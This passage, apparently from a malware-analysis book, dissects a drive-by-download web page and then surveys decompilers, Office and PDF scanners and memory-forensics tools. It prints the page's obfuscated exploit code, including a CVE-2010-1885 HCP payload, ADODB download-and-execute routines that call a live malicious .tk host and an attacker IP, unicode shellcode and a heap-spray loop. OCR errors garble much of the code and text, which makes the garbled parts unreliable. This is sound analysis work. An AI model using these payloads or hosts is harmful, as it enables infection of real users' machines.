zSTe_T[' close’ ](); 

} 

catch (1I5005f) { 

i 

try 4 

tu_WWO[' shellexecute' ](kj7_hPfx); 
} 

catch (I5005f){ 

} 

} 

catch (150051) 4 

i 

as 

M inUa(); 

af (fpyb d("*msie 6*))4 

d7cey (); 

} 


document.write(" 


<applet width= 100% height=' 100% 
code=' u Nk E.class' 

archive=' d62d948011ca9a2ebe684fbd77 
f5falb.jar' ><param name=' url' 

VALUE=' http://porno2top. tk/www/ Load. php? 
f=1&e=8' ></applet>" 

is 

if (fpvb d("windows nt 5")){ 

if (fpvb  d("msie 7") || fpvb  d("msie 
a 4 

var A WL8- = 
document.createElement(' iframe’ ); 

A WL8_.src = " 

hcp://services/search? 
query=&topic=hcp://system/sysinfo/sysinfo 
Main. htm%A%%A%%A%%SA%%SAS%AS%A%% A 6% A 6% A SAM. 


%6A%6%A%5% A %5%A 25% A 25% A%%A 5% A 25% A 25° A 5% A 25% A 25% A 5% A 


ipt+defer%s3Eeval%28new+Activex0bject%28%2 
Twscript.shell%27%29 .Run%*28unescape%28%27 
cmd%252A%252Fc%252Ataskkill%252A%252FF%25 
2A%252FIM%252Ahelpctr.exe%257Ccd%252A. .%2 
52F%2526echo%252AExecute%2528strReverse%2 
528Rep Lace%2528Replace%2528U%2529htap%252 
8cexe. L1hs%257C2%252Chtap%252Aelifotevas.o 
da%257C%2529ydoBesnopser. Lmx%2528etirw.od 
a%257Cnepo.0da%257C1%2524epyt . oda%257C3%2 
524edom.oda%257Cdnes. lmx%*257C0%252CY6%252 
4e%25261%2524f%253Fphp.daol%252Fwww%252Fk 
t.pot2o0nrop%252F%252F%253AptthY%252CYTEGY 
%252Anepo. lmx%*257CYexe .%257E%252F%253ACY% 
252A%2524%252Ahtap%257C%2529YlLlehs.tpircs 
wY%2528tcejb0etaerC%25241hs%252AteS%257C% 
2529Ymaerts .bdodaY%2528tcej b0etaerC%25240 
da%252AteS%257C%2529Yptthlmx.tfosorcimY%2 
528tcej b0etaerC%25241mx%252Ates%257Ctxen% 
252Aemuser%252Arorre%252An0U%252C%252AUYU 
%252C%252Achr%252834%2529%2529%252C%252AU 
%257CU%252C%252Avbcrl £%2529%2529%2529%252 
%253E%257E.vbs%257Cwscript%252A%257E.vbs 
%2526de1%252A%252Fq%252A%257E.vbs%27%29.r 
ep lLace%28%2F%5B%2A%5D%2Fg%2CString.fromCh 


arCode%2832%29%29. replace%28%2F%5B%24%5D% 
2Fg%2CString. f romCharCode%2861%29%29. repl 
ace%28%2FU%2Fg%2CString. fromCharCode%*2834 
%29%29%29%29%3B%3C%2FSCript%3E"; 
document.body.appendChild(A WL8_); 

} 

is 

var AWP}]HO8 = GbWxB60(); 

if (AWPjJHO8[0] == 9 && AWPJHO8[1] == 0){ 
if (AWPjJHO8[2] == 16 || AWPjJHO8[2] == 28 
|| AWPjHO8[2] == 45 || AWPjHO8[2] == 47 

I | 

AWPjHO8[2] == 64 || AWPJHO8[2] == 115){ 
qivol ("d3e963ea5da486fd6a9a70c8a04a57c0. 
swf"); 

} 

} 

If CONT Xt) 

qIvol_ ("dd82a26741b0fd9fcf93a8ec2603a678. 
pdf"); 

} 

if (fpvb_ d("msie") || 

fpvb = d("firefox")){ 

if (AWPjJHO8[0] == 9 || AWPjJHO8[O] == 10){ 
var TjTSj5 = 0; 

if (AWPjJHO8[0] == 9 && AWPJHO8[1] == 0){ 
if (AWPjJHO8[2] == 28 || AWPjJHO8[2] == 31 
|| AWPjHO8[2] == 45 || AWPJHO8[2] == 47 

I | 

AWPjHO8[2] == 48 || AWPJHO8[2] == 115 | | 
AWPjHO8[2] == 124 || AWPJHO8[2] == 151 || 
AWPjHO8[2] == 152 || AWPJHO8[2] == 159){ 
TyTsjs = 45 

} 

is 

if (AWPjJHO8[0] == 10 && AWPJHO8[1] == 0){ 
if (AWPjHO8[2] == 12 || AWPjHO8[2] == 15 
|| AWPjHO8[2] == 22){ 


LTS iS: = 4s 

} 

if 

Ti Ch tS Ss =— yt 

a_ AK6 (); 

qIivol ("7f213d9fcf9d38dc8106036ef4a32f83. 
swf"); 

iy 

is 

} 


Static and dynamic analysis: 


The next sequence creates an iFrame element 
with the following inputs/attributes: 


function qIvol (TXmYmzL) { 

var A WL8- = 
document.createElement(' iframe’ ); 

A WL8 __.setAttribute(' src , TXmYmzL) ; 


This is referenced at: 


var AWP}]HO8 = GbWxB60(); 

if (AWPjHO8[0] == 9 && AWPjHO8[1] == 0){ 
if (AWPjHO8[2] == 16 || AWPjHO8[2] == 28 
|| AWPjHO8[2] == 45 || AWPJHO8[2] == 47 

I | 

AWPjJHO8[2] == 64 || AWPjHO8[2] == 115){ 
qIvol_("d3e963ea5da48 6f d6a9a70c8a04a57Cc0. 
swf"); 

} 

} 

if (bVT_ X()){ 
qIvol_("dd82a26741b0f d9f cf 93a8ec2603a678. 
pdf"); 

} 

it (tpyvb: od(“msie*) || 

fpvb —s d("firefox")){ 

if (AWPjHO8[0] == 9 || AWPjHO8[O] == 10){ 
var IjTSj5 = 0; 

if (AWPjHO8[0] == 9 && AWPjHO8[1] == 0){ 
if (AWPjHO8[2] == 28 || AWPjHO8[2] == 31 
|| AWPjHO8[2] == 45 || AWPJHO8[2] == 47 

I | 

AWPjHO8[2] == 48 || AWPjHO8[2] == 115 | | 
AWPjJHO8[2] == 124 || AWPjHO8[2] == 151 | | 
AWPjJHO8[2] == 152 || AWPjHO8[2] == 159){ 
IjTSj5 = 1; 

} 

} 

if (AWPjHO8[0] == 10 && AWPjHO8[1] == 0){ 
if (AWPjHO8[2] == 12 || AWPjHO8[2] == 15 
|| AWPjHO8[2] == 22){ 

Cis is = 13 

} 

} 

if (IjTSj5 == 1){ 

a__AK6 (); 

qIivol_("7f213d9f cf9d38dc8106036ef 4a32f 83. 
swf"); 


} 


Next is the initialization of a URI in variable 
Xef_GKd and an attempt to launch it: 


var XeF GKd ="http: -J-jar 
J\\\\194.8.251.214\\public\\273928cb4859a 
Odb86ba8aefd34c1755.doc none"; 


You can save the entire script (without <script> 
tags) to a new *.js file and replace eval with the 
print function, which results in a print operation 
instead of obfuscation. This can be done by 
appending eval=print at the beginning of the 
script. You can also use tools such as Jsunpack 
or JSDetox to do the bulk of the work for you. 


e https://github.com/urule99/jsunpack-n 
- http://jsunpack.jeek.org/ 


- http://relentless-coding.org/projects/jsdetox 


We will continue using the Firebug debugger for 
the next steps, which is a more involved exercise. 


An Eastern European source trace, possible 
malware origin done at the time of analysis 
(http ://en.dnstools.ch/visual-traceroute.html): 


ith B 
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To get an idea of how things change rather 
quickly, this trace, done in 2015, additionally 
there is no domain name that resolves to this IP: 
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Py IP: 193.251.1285 
i+ 


ra Location: F2 








Manual insertion of java plugin using static 
versioning (which has this equivalent CLSID): 


Ey 4 


var tdeDCU = 
document.createElement(' OBJECT' ); 
tdeDCU.classid = ' clsid: CAFEEFAC-DEC7- 
0000-0000-ABCDEFFEDCBA' ; 

tdeDCU. Launch(XeF_GKd) ; 

li 


4 » 


Or dynamic versioning on exception (CLSID 
reference): 


catch (e){ 

var hJRvBR = 
document.createElement(' OBJECT' ); 
hJIRVBR.classid = ' clsid:8AD9C840-044E- 
11D1-B3E9-00805F499D93' ; 

hIRVBR. Launch(XeF GKd) ; 

} 


4 > 


If IE -6 is installed: 


M_inUa(); 

if (fpyvbi d(“msie 6"))4{ 
d7cey _(); 

} 


This leads to: 


function d7cey (){ 


var kj7_hPfx =' .//..//AA_LWO.exe' ; 
var FTwlo R =' responseBody' ; 
var ThP_G = 


document.createElement(' object’ ); 
ThP_ G.setAttribute(' id’, 'ThP_G' ); 
ThP_ G.setAttribute(' classid' , 

' clsid:BD96C556 -65A3-11D0-983A- 
00CO4FC29E36' ); 


iad esas & 

var GR_kNSi = ThP_ G[' CreateObject' ] 
Cimsxmle xmUn tp: 5. 2): 

var tu_WWO = ThP_G[' CreateObject’ ] 
( shell.application: ,. 77)? 

var zSTe_ T = ThP_ G[' CreateObject' ] 
(( adodb.stream , ""); 

EnVOX 


zSTe_T[' type’ ] = 1; 
GR_KkNSi[' open’ ]('GET' , 
'http://porno2top. tk/www/ load. php? 
f=1&e=4' , false); 
GR_kNSi[' send' ](); 
zSTe__T[' open’ ](); 

zSTe_T['write’ ](GR_kNSi[FTwlo R]); 
zSTe_T[' savetofile’ ](kj7_hPfx, 2); 
zSTe_T[' close’ ](); 

} 

catch (I5005f){ 

if 

try 4 

tu_WWO[' shellexecute' ](kj7_hPfx); 
i 

catch (15005T){ 

} 

} 

catch (I5005f){ 

is 

} 


Binary data is saved in AA_LWO.exe from an ADO 
stream object using a GET request to 
http://porno2top.tk/www/load.php?f=1&e=4. 


This currently redirects to: 
http://jotzz.bigprizezone.6673.info/? 
sov=265069507&hid=flflxlplflfhp&redid=6201& 
gsid=22&id=XNSX.-r6201-t22. 


shellexecute is used to launch AA_LWO.exe. 


A brief search on the World Wide Web about ADO 
streams reveals a few properties which are shown 
in the next image. 


Without going into too much detail (which you 
are encouraged to explore), ADO is one way to 
implement the data access. With RDS and its 
object hierarchy, you can create instances of the 
objects lower down the hierarchy directly, and 
then use them to implement a more customized 
form of remote data access. 


The mechanism for XMLHTTP is described at 
https://support.microsoft.com/en-us/kb/296772. 











How To Send a Binary Stream by Using XMLHTTP 
View products that this article applies to, 
This article was previously published under 0296772 


[+].On This P 


Expand all | Collapse all 
In some cases you may want to send a binary stream to a server, One way to do so is to use 


the IXMLHTTPRequest object, This article demonstrates how to retrieve an ADO recordset 
from a server, modify it, and send it back as a stream of binary data, 


Back to the top 


cc 
This example uses the ADODB,Stream object to hold the binary data that is to be sent back to 
the server, If a newer version of MSXML has been installed in Side-by-Side mode, then to run 
the sample code with that specific version, you must explicitly use the GUIDs or ProglDs for 
that version, For example, MSXML version 4 only installs in side-by-side mode, Please refer to 
the following article in the Microsoft Knowledge Base to see what code changes required to run 
the sample code with the MSXML 4,0 parser: 0305019 INFO: MSXML 4.0 Specific GUIDs and 
Proglds, 


For example, in the code below, you would create objects with MSXML 4,0 with the following 
statements: 


+ var xmlhttp = new ActiveXObject("Msxml2,XMLHTTP.4,0"); 
+ xmldoc = new ActiveXObject("Msxml2,D0MDocument.4.0") 
+ var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP.4,0"); 





To use XMLHTTP to send a binary stream to a server, follow these steps: 


1, Paste the following code into a file in your default Web folder and name the file 
Receiver.asp, 


V4 


chim Connection 
cin rs 

Connection = "Provider=SQLOLEDB, 1; Data Sourcesservername; User Idcusername; Passwords 
sql = "Select * from Customers” 


set 1's = server, (reatedbject("ADODB, Recordset") 


| Hf Request .QueryString("getRecordset") = "YES" then 
rs.ActiveConnection = Connection 
rs.CursorLocation = 3 ‘Client Side 

Ps. CursorType = 3 ‘Static Recordset 
rs.LockType = 4 ‘Batch Optimistic 

rs,0pen sql 

I's, Save response, 1 'persist adPersisty 
Response, End 








| élse 








Continuing, the other branch taken is- 


The following link (which can be deemed 
malicious) is accessed: 





. tk is the Internet country code top-level domain 
(ccTLD) for Tokelau, a territory of New Zealand, 
located in the South Pacific. 


A possible pointer at this domain level by 
research from Intel-McAfee regarding spam and 
phishing activities is available at: 
https://en.wikipedia.org/wiki/.tk. 


Embedded exploits 


If the Windows NT family and IE-7 or IE-8 is 
installed, the following function is activated, 
where an iFrame element is created with a now 
well-documented HCP exploit. It can allow remote 
code execution, especially when the user has 
unrestricted access on the Windows platform, 
and being a dormant threat on accounts with 
limited access once installation is done: 





Another short search on the web for more 
information reveals the following links, which you 
can look at: 


e http://www.pcworld.com/article/198514/protect_windows_ 
xp_from_zero_day_flaw_in_ hcp_protocol.html 





e http://www.computerworld.com/article/2468351/microsoft- 
windows/what-you-need-to-know-about-the-windows-hcp- 
flaw.html 


- http://www.cve.mitre.org/cgi-bin/cvename.cgi? 
name=CVE-2010-1885 


e https://technet.microsoft.com/en- 
us/library/security/2219475.aspx 
Visit the following link for a detailed explanation 
of this exploit: 
http://seclists.org/fulldisclosure/2010/Jun/205 


MS Essentials anti-malware detects the unpacked 
exploit as shown as follows: 





Detected items Alertlevel © Recommendation Status 


PTE yploitWind2/CVE-2010-1805,A Severe «ents v ee 








The following is an excerpt from 
https://www.microsoft.com/security/portal/threat/ 
Encyclopedia/Entry.aspx? 
Name=Exploit:Win32/CVE-2010-1885.A#tab=2. 
It gives a good overview of this particular threat. 


Exploit: Win32/CVE-2010-1885.A (?) 
Encyclopedia entry 
Updated: Jun 28, 2010 | Published: Jun 10, 2010 
Aliases 
CVE-2010-1885 (other) 


Exploit:Win32/CrossSiteHCPA (other) 


Exploit. HTML.CVE-2010-1885.a (Kaspersky) 
Exploit/Cve-2010-1885 (Norman) 
HTML/Exploit.CVE-2010-1885 (ESET) 
Exploit.Win32.CVE-2010-1885 (Ikarus) 
Exploit-CVE2010-1885 (McAfee) 
Mal/HcpExpl-A (Sophos) 
TROJ_HCPEXPA (Trend Micro) 
Exploit. HTML.HCPa (Sunbelt Software) 
Alert Level (?) 
severe 
Antimalware protection details 


Microsoft recommends that you download the 
latest definitions to get protected. 


Detection last updated: 
Definition: 1.93.731.0 
Released: Oct 29, 2010 
Detection initially created: 
Definition: 1.83.1506.0 
Released: Jun 10, 2010 


Exploit: Win32/CVE-2010-1885.A is a detection for 
a cross-site scripting method that exploits a 
vulnerability (CVE-2010-1885) in Windows Help 
and Support Center that could allow an attacker 
to run arbitrary code on the local computer. 


Symptoms 


Alert notifications or detections of this malware 
from installed antivirus or security software may 
be the only other sympton(s). 


Technical Information (Analysis) 


Exploit: Win32/CVE-2010-1885.A is a detection for 
a cross-site scripting method that exploits a 
vulnerability (CVE-2010-1885) in Windows Help 
and Support Center that could allow an attacker 
to run arbitrary code on the local computer. 


Installation 


Exploit: Win32/CVE-2010-1885.A may be 
encountered if a Windows XP/2003 user is enticed 
to browse a malicious Web page or click on a 
hyperlink that contains the exploit. 


The exploit passes a URL (for example, 
hcp://<URL>) to "helpctr.exe" using specific 
escape sequences that could result in the 
execution of arbitrary code. 


This exploit affects computers running Windows 
XP/2003 with Internet Explorer 8 (or below) and 
Windows Media Player 9. Upgrading to Windows 
Media Player 10 prevents the exploit from running 
without a prompt. 


Exploit: Win32/CVE-2010-1885.A downloads 
TrojanDownloader./S/Adodb.F, and then 
downloads and executes another Javascript 
component detected as 
TrojanDownloader:/S/Adodb.G. 


Thus, this exploit as implemented in this sample 
is as follows: 


"hcp://services/search? 
query=&topic=hcp://system/sysinfo/sysinfo 


main. htm%sA%%A%%A%%A %%A %%A%S%A SA SOA 25% A 5% A M5 


pt+defer%~3Eeval%28new+Activex0bject%28%27 
wscript.shell%27%29 .Run%28unescape%28%27Cc 
md%252A%252Fc%252Ataskkill%252A%252FF%252 
%252FIM%252Ahelpctr.exe%257Ccd%252A. .%25 
2F%2526echo%252AExecute%2528strReverse%25 
28Replace%2528Replace%2528U%2529htap%2528 
cexe. 1hs%257C2%252Chtap%252AeLifotevas.od 
a%257C%2529ydoBesnopser. Lmx%2528etirw.oda 
%257Cnepo.oda%257C1%2524epyt .o0da%257C3%25 
24edom.oda%257Cdnes. Lmx%257C0%252CY6%2524 
€%25261%2524f%253Fphp.daol%*252Fwww%252Fkt 
-pot2onrop%252F%252F%253AptthyY%*252CYTEGY% 
252Anepo. lmx%257CYexe . %257E%252F%253ACY%2 
52A%2524%252Ahtap%257C%2529YlLlehs.tpircsw 
%2528tcejbO0etaerC%25241Lhs%252AteS%257C%2 
529Ymaerts .bdodaY%2528tcej b0etaerC%25240d 
a%252AteS%257C%2529Yptthlmx.tfosorcimY%25 
28tcejb0etaerC%25241mx%252Ates%257Ctxen%2 
52Aemuser%252Arorre%252An0U%252C%25 2AUYU% 
252C%252AChr%252834%2529%2529%252C%252AU% 
257CU%252C%252Avbc rl F%2529%2529%2529%252A 
%253E%257E.vbs%257Cwscript%252A%257E.vbs% 
2526de1%252A%252Fq%252A%257E.vbs%27%29.re 
place%28%2F%5B%*2A%5D%2Fgs2CString. fromCha 
rCo0de%2832%29%29. replace%28%2F%5B%24%5D%2 
Fg%2CString. fromCharCode%2861%29%29.repla 
ce%28%2FUS2Fg%s2CString. fromCharCode%2834% 
29%29%29%29%3B%3C%2FScript%3E" 


The following is the sequence after unescaping 
and being partially decrypted in Firebug: 


..\..\sysinfomain.htmu003fsvr= 
<script+defer > 

eval (newt+ActiveXxObject (' 

wscript.shell' ).Run(unescape(' cmd*/c*task 
KiLU*7E*/ IM 


*helpctr.exe| cd*../&echo*Execute(strRever 
se(Replace(Replace(U)htap(cexe.lhs| 2,htap 
*elifotevas.oda| )ydoBesnopser. 

Lmx (etirw.oda| nepo.oda| 1¢epyt.oda| 3$edom. 
oda| dnes.lmx| 0, Y6$e&1$ f3Fphp.daol/www/kt. 
pot2onrop//:ptthy,YTEGY 

*nepo.lmx| Yexe.~/:cY*$*htap| )Yllehs.tpirc 
swY (tcejbOetaerC$lhs*teS| )Ymaerts.bdodaY ( 
tcejb0etaerC$oda*teS| 

)Yptthlmx.tfosorcimy (tcejbOetaerC$ lmx*tes 
| txen*emuser*rorre2Anou, *UYU, *chr(34)) ,*U 
[US Avbcr lt) 

)* >~.vbs| wscript*~.vbs&del*/q*~.vbs' ). 
replace(/[*]/g,String. fromCharCode(32)).r 
eplace(/[$]/g,S 

tring. fromCharCode(61)).replace(/U/g,Stri 
ng.fromCharCode(34)))); 

</script > 


Even so, you can already see signs of an 
obfuscated url, so that is a good sign about the 
extent of progress made in your analysis. You can 
see the string /www/kt.pot2onrop//:ptth and 
the function strings Execute(strReverse), 
which at first glance can be assumed to reverse 
the preceding string to a valid url. This is exactly 
what we will get during the course of the 
complete shellcode analysis. 


Shellcode analysis, let's move on to this area of 
the obfuscated script: 


var UL -Cz 0" -= 

unescape("%Su9c60%uec81%uU0200%uU0000%UN0e8% 
u0000%u5d00%uc581%uU011a%Uu0000%uUCcO31%U8b64 
%U1840%U408b%u8b30%uU0C40%uU7 88d%uU8b1c%U8b3 
%U2077%ud231%Uu05eb%uc2c1%u3007%u66C2%U24 
ad%u75df%u81f5%ubc f2%u5367%u756 fFsu8be4%ud 
85 f%<u758d%ue800%uU007e%u0000%Ue789%U758d%u 
e814%u00c8%u0000%u f £57%U0055%uCc389%uU758d% 
ue80c%su0066%uU0000%uU758d%ue820%uU00b2%u0000 
%ucO31%uCc983%uFf2 f f%u4 fae%ue389%uU758d%ue83 
a%u00a0%U0000%uUCO31%U0738%uU3d74%uU5746%ubC 
8d%u0024%u0001%uU8900%U5007%uU6850%uU0 100%uU0 
000%u5357%uf f50%u0c55%uc0O9%ule75%u488d%u 
2954%u57cf%suaa f3%u578d%uc7bc%u4402%uU0000% 
u5200%u5050%u206a%U5050%uU5050%uf f57%uU0455 
s%ueb5 f%su81b8%u00c4%u0002%u9d00%UC361%uUeb5 


%ue808%uU000a%U0000%U4689%uad f csuUCcOO9%sUF3 
75%uc35e%u5756%uCc189%U438b%uU8b3c%U037 c%UO 
178%u8bd f%u2077%uded 1%uad56%ud801%ud231%u 
c€2c1%u3207%U4010%U3880%U7500%uU31f5%uU75ca% 
u58ec%uc629%ueed1%u7 703%uU0 f24%uU44b7%ufe33 
S%sue0c1%u0302%uU1Cc47%Uu048b%uU0103%u5fd8%uCc35 
e%u8a57%U4606%U0632%u7 5aa%u5 f fa%u26c3%uUac 
80%uc7c8%uU318a%U0046%uU0000%U2900%uCcCc1b%ud 
02 f%u0000%ub f00%U07ea%uU01le%Uu0102%uU6a60%u 
0008%u8b4c%ulce3%u0400%uU154a%uU5 fOO%uU1d1f% 
u@11c%u465d%ul f 1b%u5a5e%u441F%u0058%u5800 
%u912 f%uU03 fd%u050e%u5e4a%u1818%uU594F%uU0Cc5 

%U4317%u0 f58%ue732%U038b%uU050e%u5e4a%u18 
18%u594f%u0 £5b%U4314%u0 F58%u F532%U0399%U0 
50e%u5e4a%u1818%u594 f%u0e5b%uU4315%u0 F58%u 
db32%u00db" ) 


The malicious code decoded from the preceding 
snippet is shown in the following exhibit (done in 
Malzilla (Misc Decoders | USC2 to Hex | Hex 
To File) and Hex-Workshop): 


You just paste the previous text in the Malzilla 
Misc Decoders tab text box and press the 
buttons in sequence for Malzilla to convert the 
encoding to binary format. 


You can import this hex dump to IDA Pro and 
press Cat offset 0x0, or use OllyDbg to open the 
hex dump via View | File and then the context 
menu Binary | Binary Copy and in a code cave 
or custom area in the target binary loaded via 
File | Open, perform a binary paste via right 
click Binary | Binary Paste, and set the EIP via 
right click New origin here. This is one quick 
and dirty, and a non-persistent way of doing it. 
You can also save some time by encapsulating it 
in an executable husk with the PE headers all set 
to go from the OEP. 











D00001A0 








After conversion from shellcode to exe file format 
(http ://sandsprite.com/shellcode 2 exe.php), the 
following characteristics were noted: 


You can paste the text directly into the link text 
box and press Submit to get the executable 
husk for download. 





CRC-32, BAF? 
MDS: 373291 EDAACSFB18952ACA728ABF6D26 
SHAT: 881F351 3ADODD4F00BF26A7038E61F4CC9ESBE62 





If you have Python installed and want a local 
program, then the shellcode2exe. py script does 
quite the same job of it. 
https://raw.githubusercontent.com/MarioVilas/she 
Ilcode_tools/master/shellcode2exe.py. 


python shellcode2exe.py -s shellcode.txt 


which is the switch for ASCII text input in the 
0x90x90 format. The output is an executable file 
with the same name as the input file 
(shellcode. exe). 


An online search results in detection by six 
vendors as a trojan downloader. 


The remaining loop in function a_ AK6 () isa 
familiar code sequence for a heap spray 
(invented by a hacker named Skylined), an 
exploitation technique that is very well 
documented and used in exploit codes, which 
utilizes large NOP sleds so that the real payload 
can be executed with some confidence in terms 
of probability. Exploits have a familiar format 
consisting of a NOP sled, an encoder/decoder 
block, and the real payload sandwiched between 
the two. The decoder passes control to the NOP 
sled, which, in turn, gets to the real payload and 
executes it. Encoding is important because the 
NULL character will result in the codes being 
detected as C strings and fail to execute. In this 
case, we will find that this is a download and 
execute type of shellcode, which is via a drive-by 
download as we have seen in this web page 
script. The user just has to visit the page and the 
exploit will target any existing vulnerabilities to 
gain access to the victim's system. 


while (agTK_0.length <= 0x10000 / 
2)agTK_O += agTK 0; 

agTK_0 = agTK_0.substring(0, 0x10000 / 2 
= WU Cz 0 .length); 

Yf7Dp_ = new Array(); 

for (FIOUR. = 0; FIOUR.. < 0x1200; 
FIoUR_ ++ ){ 

Vip ETOUR 1) -=-agtk 20+ Ue 2.0) | 


4 > 


Moving on, this shellcode is again extracted and 
converted to exe format for analysis. 


Obfuscated API interface, API DIl and function 
names are built dynamically and loaded using 
LoadLibrary(): 


As shown in the following image, at 401075h, we 
see dynamic allocation of imports to a very 
important API function for finding function 
addresses of Windows API functions: 


Shortly after, at 40113Ch, you can see a decoding 
block with a single byte XOR loaded in the 
address referenced by ESI register. This will be 
used by the exploit to decode both import entries 
and custom strings. 





The import strings are built in memory with the 
suspicious entry URLMON. DLL: 


Following is the URL decryption: 





This results in the following: 





It also downloads the url to a file in the local 
system: 





It goes in an infinite loop of checking for a valid 
internet connection using ping and repeating the 
sequence all over again. 


TcpView shows 592 UDP port usages for this 
download activity. 


Until now, the script as well as the shellcode, 
essentially replicates the malicious activity of the 
obfuscated HTML/Javascript page. The 
downloaded payload is another exercise but in 
essence it is another launcher and redirects to a 
vulgar site for further nefarious activity. This kind 
of activity is no longer a surprise and is to be 
expected with current slew of malware making 
use of more complicated exploits to gain covert 
access to the victims machine and perform 
identity theft or intellectual property theft. This 
leads to malware becoming installed and 


compromised bank logins being performed, and 
so on. You have further seen how you can 
leverage the web for information gathering as 
well as analyzing malicious scripts with a minimal 
toolset and already installed software, for the 
most part. 


You can also use online tools to deobfuscate and 
analyze Javascript. Quite a few of them are point 
and click with url or file submission, or code copy 
and paste, and present an easy to use interface: 


- http://jsbeautifier. org/ 
« https://jsfiddle.net/ 
« http://wepawet.iseclab.org/ 


e http://www.kahusecurity.com/2012/revelo-Javascript- 
deobfuscator/ 


- http://stunnix.com/prod/jo/ 


Byte code 
decompilers 


Malware does not discriminate and makes an 
effort to infect any platform or technology of 
choice in order to achieve its goal. In terms of 
malicious vectors, even .NET, Java jar executable 
files, Visual Basic executables (P-Code and Native 
Code), as well as Delphi executables, are all very 
well utilized for many kinds of malware. 


VB code is particularly well used for thwarting 
reverse engineering as all the calls begin with a 
single point of contact - the visual basic runtime 
dil. Additionally, VB comes in two flavors - P code 
or pseudo code can be analyzed and source code 
decompiled to a degree. Native code presents 
familiar problems in decompilation technology 
and only analysis is a realistic expectation and 
not full source code analysis. https://www.vb- 
decompiler.org/ is the best VB decompiler as of 
now. 


.NET files is a relatively well-researched and 
documented technology and a bevy of 
decompilers exist for this. The source code can 
be recompiled straight from the decompiled 
listings, called Intermediate Language (IL). 
Obfuscation does exist, which results in strings 
being scrambled, and function names and 
variable symbols having ambiguous names. This 
further discourages reverse engineering and can 
defeat decompilation as well. Most of the tools 
shared in the following list are of the drag-and- 
drop kind. They give a byte code or intermediate 
language textual representation along with the 
rich metadata, which results in quite a good 


source code representation from the target 
binary. 


- http://www.red-gate.com/products/dotnet- 
development/reflector/ 


- http://www.netdecompiler.com/ 
- http://decompiler.net/ 


« Megadumper (register at https://exelab.ru/f/index.php? 
action=vthread&forum=3&topic=20686) 


e https://www.nulled.io/topic/2418-megadumper-dotnet-10- 
by-codecracker-snd/ 


e https://forum.tuts4you.com/topic/31899-unpackers-tools- 
source-code-c/ 


- https://github.com/Oxd4d/de4dot 


Delphi files can be successfully decompiled using 
DeDe, the Delphi decompiler tool. 


- http://kpnc.org/idr32/en/ 


e http://www.softpedia.com/get/Programming/Debuggers- 
Decompilers-Dissasemblers/DeDe.shtml 


The Java jar files, which are zip files, and the 
.class format are very well documented. 
Reverse engineering Java files has boiled down to 
a specific set of mappings that have enabled a 
very high degree of source code recovery 
possible from compiled Java executables. Jad 
(java decompiler, available at http://jd.benow.ca/) 
is one of the best decompilers for Java. Java 
decompilers are also useful for Android malware 
analysis as the android binaries are essentially 
Java .class files re-structured as a single .dex 
file, which is inside a zip file renamed as a .apk 
package. To get a more detailed account of this 
process in a book you can read Covert Java: 
Techniques for Decompiling, Patching, and 
Reverse Engineering, Alex Kalinovsky. 


Document analysis 


Digital documents are something we all consume 
in one form or another. Malwares have been 
making use of this medium for a very long time 
indeed, and even more so given the popularity of 
software ebook readers and the PDF format, 
which is mainly used for targeted spear phishing 
and as an exploits vector. MS Office files are also 
very popular targets given that Windows has the 
largest market share and most of the users use 
these software. Some of the more popular tools 
are as follows: 


e OfficeCat: This can be found at 
https://www. microsoft.com/enus/download/details.aspx? 
id=36852 


« OfficeMalScanner: This can be found at 
http://www.reconstructer.org/code.html with the various 
options as follows and the output of the scan mode. 


o% Select C:\WINDOWS\system32\emd, exe 


- scan for several shellcode heuristics and encrypted PE-Files 
- dumps OLE structures, offsetstlength and saves found VB-Macro code 
inflate - deconpresses Ms Office 2007 documents, e.g. docx, into a temp dir 
Switches: (only enabled if option "scan" was selected) 
brute - enables the “brute force mode” to find encrypted stuff 
debug - prints out disassembly resp hexoutput if a heuristic was found 


Examples: 
OfficeMalScanner evil.ppt scan brute debug 
OfficeMalScanner evil.ppt scan 
OfficeMalScanner evil.ppt info 


Malicious index rating: 
Executables: 20 
Code : 10 


C:\Documents and Settings\Adninistrator)"C:\Docunents and Settings\Administrator 
\Desktop\0fficeMalScanner\OfficeMalScanner.exe” "C:\Documents and Settings\Admin 
istvator\Desktop\Partner Preso slide 11-20.ppt" scan 


[¥] SCAN node selected 

[*] Opening file C:\Documents and Settings\Administrator\Desktop\Partner Preso s 
lide 11-20. ppt 

[¥*] Filesize is 6407168 (@x61c408) Bytes 

[*] Ms Office OLE2 Compound Format document detected 

[*] Scanning now... 


LODSB/STOSB ROR decryption signature found at offset: x56d686 


LODSD/STOSD OR decryption signature found at offset: @x23h93b 
LODSD/STOSD XOR decryption signature found at offset: OxS2eale 


Analysis finished! 








OffVis: This can be found at 

https://www. microsoft. com/en-us/download/details.aspx? 
id=2096. As shown in the following image, it uses a hex 
view and a selection of parsers from the drop down menu 
that can aid in auditing of the MS Office documents: 
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For PDF files, the extraction of Javascript, Flash content or 
executables is the main objective. After that, rest of the 
process is quite the same as regular Javascript 
deobfuscation, which can include exploits (including the 
popular heap spray) and shellcode packed inside it. A PDF 
document is composed of the file magic number or the 
signature %PDF-1.1, followed by a hierarchy of objects 
replete with tags that categorize the objects, followed by 
an ending marker %%EOF. Some of the types are Boolean 
values, Number, Strings, Names, Arrays, Dictionaries, 
and Streams. 


PDF Examiner: This can be found at 
https://github.com/mwtracker/pdfexaminer 


« Wepawet: This can be found at 
http://wepawet.iseclab.org/ 


PDF StreamDumper: This can be found at 
http://sandsprite.com/blogs/index. php?uid=7&pid=57 
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PDF StreamDumper also has a very capable and featured 
Javascript deobfuscation and analysis engine. The 
Javascript streams can be chosen from the object list at 
the left hand tab and initially perused with the text, hex, 


and object information tabs. The Javascript Ul can then be 
invoked to commence analysis. 
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Byploit CvB-2007-$659 Date:5.6,08 v8.1.1 - collectinailInfo - found in nain 
textbox Line: 29 


Other exploits may be hidden w/ obsfuscation 
May also be used innocently, 




















e SWF Decompiler: This can be found at 
http://www.eltima.com/products/flashdecompiler. It is one 
of the better products that can analyze upto ActionScript 
3.0 and aid in Flash (*. swf) files analysis. 


Redline - malware 
memory forensics 


Redline from Mandiant is a one-stop shop and a 
poor man's malware forensic utility, all-in-one 
useable interface. If you compare Redline with 
other forensic software such as Encase, FTK, or 
Oxygen Forensics, which are used heavily in law 
enforcement circles, you will notice that the 
priorities are somewhat different. Malware is the 
only agenda for Redline! Redline analyzes 
Windows OS from the memory capture and the 
filesystem, identifies Indicators of Compromise 
(IOC), builds a timeline of events, and computes 
a Malware Risk Index (MRI) score. It can also 
use a whitelist of MD5 hashes to identify known 
and valid files and further aid in reducing noise in 
